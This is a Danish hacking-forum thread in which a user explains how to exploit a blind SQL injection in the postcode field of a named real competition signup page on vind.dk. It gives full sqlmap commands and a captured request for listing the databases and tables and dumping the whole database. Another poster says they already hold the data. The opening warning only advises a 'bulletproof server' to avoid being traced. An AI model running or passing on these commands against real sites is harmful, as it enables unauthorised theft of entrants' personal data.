OPS!
Dette er kun fremgangsmåden!
Jeg anbefaler ALDRIG at prøve selv, medmindre du er 100% sikker på, at du har en bulletproof server
(05-07-2017, 01:53)Kopa Skrev: [ -> ]Du kan selv tage databasen eller eventuelt få nogen til det.
http://www.vind.dk/Den_Store_RejseQuiz/V...signup.asp
Der er Blind SQLi på POST input email
Mener du ikke på postnummeret?
Nå, send mig en PB.
Jeg har databasen, Niklas.
Så kan jeg evt. også vise dig, hvordan du gør.
Efter jeg modtog en PB, forklarede jeg godt og grundigt, hvordan jeg gjorde.
Her er min metode:
Tricket er, at have SQLmap også køre følgende kommando:
sqlmap -u "http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp" --data="action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted" -p "zip" --dbs --threads 6
Kode:
-u "http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp"
sørger for, at den ved, hvilken side det er på.
Kode:
--data="action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted"
gør at den ved, hvad den skal skrive i de forskellige felter. I mit tilfælde har jeg bare skrevet noget tilfældigt ind og herefter captured det med burp suite.
En normal burp suite intercept request (bare en html request) ser sådan her ud:
Kode:
POST /Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp HTTP/1.1
Host: www.vind.dk
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: da,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 172
Referer: http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp
Cookie: rejsequizRegler=XXXXXXX
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted
dette gør, at den sætter "zip" til target. Zip vulnerable overfor SQL injection.
dette gør at den kigger efter alle de databaser der findes. --threads 10 gør, at den gør det så hurtigt den kan.
Hvis vi nu vil grave ind i en database, så kan vi gøre det på denne måde:
Kode:
sqlmap -u "http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp" --data="action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted" -p "zip" -D vinddk --tables
Læg mærke til, at jeg har sat en -D på (der vælger databasen) og --tables der siger, at den skal vise alle tables i den database.
Vælger jeg nu, at jeg gerne vil hente hele databasen ned (ikke kun en tabel, men HELE databasen), så skriver jeg:
Kode:
sqlmap -u "http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp" --data="action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted" -p "zip" --dump --threads 10
Denne gør, at det kun er databasen "vinddk"
Kode:
sqlmap -u "http://www.vind.dk/Den_Store_RejseQuiz/Vind-et-rejsegavekort-til-SolOgStrand/signup.asp" --data="action=Submit&questionID=297&answer=3&firstname=test&lastname=test&zip=test&gender=male&birthyear=1999&email=test%40test.dk&x=159&y=47&permission_accept=Permission+accepted" -p "zip" --tables -D vinddk --dump --threads 10
Du kan google dig frem til flere sqlmap tutorials på nettet :) eller blot spørge her. Det tog lidt længere tid end forventet at svare. Jeg håber du kunne bruge mit svar.
- TheHacker